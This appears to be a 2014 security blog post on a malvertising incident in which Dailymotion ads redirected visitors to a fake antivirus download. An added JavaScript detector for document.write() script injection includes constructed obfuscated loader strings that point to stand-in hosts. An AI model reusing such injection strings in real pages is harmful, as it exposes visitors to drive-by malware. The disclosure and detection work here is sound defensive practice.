Dailymotion redirects to Fake AV Threat

Jan 7, 2014


Today we noticed that browsing to hxxp://www[.]dailymotion[.]com yields a Fake A/V threat as seen in the brief video below. Details of the malware have been provided below. The payload has a current detection ratio of 10/47.

As of the time of this blog (1:30 EST 1/7/14) the payload was still being served to our knowledge. We have been in contact with the web property and disclosed this information. We will provide updates/further analysis as we have it available.

The threat compels the target to download a malicious .exe as a ruse to “clean” their “infected” machine: a traditional Fake A/V attack. Noteworthy is the fact that the web property is ranked around 90th in the world, with more than 17m monthly viewers, and that this payload is served through a third-party ad network, similar to what was witnessed a few days ago with Yahoo!

[Image: Dailymotion fake AV]

The redirect is to hxxp://853e4f39[.]webantivirusprorh[.]pl/, as seen in the Invincea forensic data captured from running the malware in the virtual container:

[Image: fake AV]

A JavaScript-based redirect is loaded via and seen here. You can see the obfuscated script tag on the first line, which gets written to the page via a document.write():

[Image: Fake AV]

The following script loaded from does another document.write() to the .pl site hosting the FakeAV binary, as seen here:

[Image: Fake AV Dailymotion]
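One way to triage captured ad-slot JavaScript for the document.write()-based redirect described above. This is an added example, not code from the original post or from Invincea; the host names, the allowlist and the sample script are constructed, and the obfuscation forms it decodes are assumptions, since the post shows the actual script only as an image.

```javascript
// Added example: static triage of ad-slot JavaScript for document.write()
// calls that inject a <script>/<iframe> loader from an unexpected host.
// All host names and the SAMPLE input are constructed for illustration.

// Undo light string obfuscation (assumed forms): String.fromCharCode(...),
// "a" + "b" concatenation, \xNN escapes and %NN (unescape-style) escapes.
function deobfuscate(expr) {
  return expr
    .replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, nums) =>
      JSON.stringify(String.fromCharCode(...nums.split(',').map(Number))))
    .replace(/["']\s*\+\s*["']/g, '')
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return every script/iframe written by document.write() whose source host
// is neither the page itself nor an expected (allowlisted) ad host.
function findInjectedLoaders(source, pageHost, allowedHosts = []) {
  const findings = [];
  const writeCall = /document\.write(?:ln)?\s*\(([\s\S]*?)\)\s*;/g;
  for (const [, arg] of source.matchAll(writeCall)) {
    const markup = deobfuscate(arg);
    const tag = /<(script|iframe)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
    for (const [, name, src] of markup.matchAll(tag)) {
      let host;
      try { host = new URL(src, `http://${pageHost}/`).hostname; } catch { continue; }
      if (host !== pageHost && !allowedHosts.includes(host)) {
        // obfuscated=true means the tag was only visible after decoding
        findings.push({ tag: name.toLowerCase(), host, obfuscated: markup !== arg });
      }
    }
  }
  return findings;
}

// Constructed sample: one benign write, one expected ad tag, two hidden loaders.
const SAMPLE = [
  'var slot = "ad-728x90";',
  'document.write(unescape("%3Cscr" + "ipt src=%22http://redirector.example.invalid/r.js%22%3E%3C/scr" + "ipt%3E"));',
  'document.write("<div class=ad>" + slot + "</div>");',
  `document.write("<scr"+"ipt src='//cdn.adnetwork.example/tag.js'></scr"+"ipt>");`,
  'document.write(String.fromCharCode(60,105,102,114,97,109,101) + " src=http://landing.example.invalid/ width=1 height=1>");',
].join('\n');

console.log(findInjectedLoaders(SAMPLE, 'www.publisher.example', ['cdn.adnetwork.example']));
```

Because it only pattern-matches source text, a check like this suits triage of saved page captures; a loader assembled entirely at run time still needs the kind of execution trace shown in the images above.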

Contents of the index page hosted on 853e4f39[.]webantivirusprorh[.]pl

[Image: Fake Dailymotion antivirus]

Upon successful installation, the system is rebooted and the victim is presented with the following image showing an active “scan” of their system:

[Image: Fake Dailymotion antivirus, scan screen]
